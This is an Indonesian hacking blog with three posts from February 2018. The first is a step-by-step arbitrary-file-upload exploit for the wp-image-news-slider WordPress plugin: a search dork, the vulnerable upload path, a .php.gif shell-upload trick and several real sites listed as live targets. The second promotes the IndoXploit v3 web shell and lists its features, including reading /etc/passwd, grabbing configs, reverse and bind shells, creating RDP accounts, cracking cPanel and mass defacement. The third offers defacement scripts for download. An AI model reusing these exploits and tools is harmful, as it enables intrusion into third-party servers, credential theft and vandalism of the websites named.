Tuesday, 27 February 2018

Archive for February 2018

Arbitrary File Upload wp-image-news-slider Vulnerability

Idiot BlackHat Tuesday, February 27, 2018 7 Comments
Dork: inurl:wp-content/plugins/wp-image-news-slider
Upload.php: wp-image-news-slider/js/swfupload/js/upload.php
Dorking dulu pake dork diatas pilih target, buka upload.php
Vuln: "No upload found in $_FILES for Filedata"
CSRF Online: Click Here
URL: http://site.com/[path]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
POST File: Filedata
Upload shell ext: .php.gif
shell location: /wp-content/uploads/random_name.php.gif
Live Target/Demo:
http://www.bittemilano.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://wfcj.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://namastefarms.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://tclecateau.free.fr/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php

Saturday, 10 February 2018

Archive for February 2018

SHELL IndoXploit v3

Idiot BlackHat Saturday, February 10, 2018 Leave a Reply
Yooo whatsapp guys,kali ini saya akan membagikan Shell IndoXploit
Ini dia feature nya
=============================================
**** COMMAND BASED *****
- Read File
usage: rf [filename]
example: rf /etc/passwd
- Spawn File/Tools
usage: spawn [name]
[name]
- Adminer (adminer)
- WebConsole (webconsole)
- CGI Telnet 1 (cgitelnet1)
- CGI Telnet 2 (cgitelnet2)
- PHPINFO (phpinfo)
example:
spawn adminer
spawn webconsole
spawn cgitelnet1
- Jumping
usage: jumping
- Config Grabber
usage: idxconfig
- Symlink
usage: symlink
- Reverse Shell
[Back Connect]
usage: rvr bc [IP] [PORT] [TYPE]
example:
rvr bc 127.0.0.1 1337 bash
rvr bc 127.0.0.1 1337 perl
[Bind Port]
usage: rvr bp [PORT] [TYPE]
example:
rvr bp 1337 perl
- KRDP - Create RDP Account (for windows server only)
usage: krdp
- Logout From Shell
usage: logout
- Kill Backdoor
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit
Sekian post saya,maaf kalo berantakan :v
Archive for February 2018

Kumpulan Script Deface Keren

Idiot BlackHat Saturday, February 10, 2018 3 Comments
Hai semua:D
Dipost pertama ini ane mau share script deface yang keren"XD
Gausah banyak omong, langsung aja nih comot
1. Script Deface By Mr.X0X
     Lihat tampilan DISINI
     Download DISINI
2. Script Deface By Achon666ju5t
     Lihat tampilan DISINI
     Download DISINI
3. Script Deface By CowoKerensTeam
     Lihat tampilan DISINI
     Download DISINI
4. Script Deface By ML7C
     Lihat tampilan DISINI
     Download DISINI
5. Script Deface By FRK48
     Lihat tampilan DISINI
     Download DISINI
6. Script Deface By Gboys_Flush
     Lihat tampilan DISINI
     Download DISINI
7. Script Deface By ZoRRoKiN
     Lihat tampilan DISINI
     Download DISINI
8. Script Deface By xNot_Found
     Lihat tampilan DISINI
     Download DISINI
9. Script Deface By SecurityCrewz
     Lihat tampilan DISINI
     Download DISINI
Segitu aja gan, maaf kalo kurang:D
Tinggal edit tuh pasti tau lah cara ngeditnya:D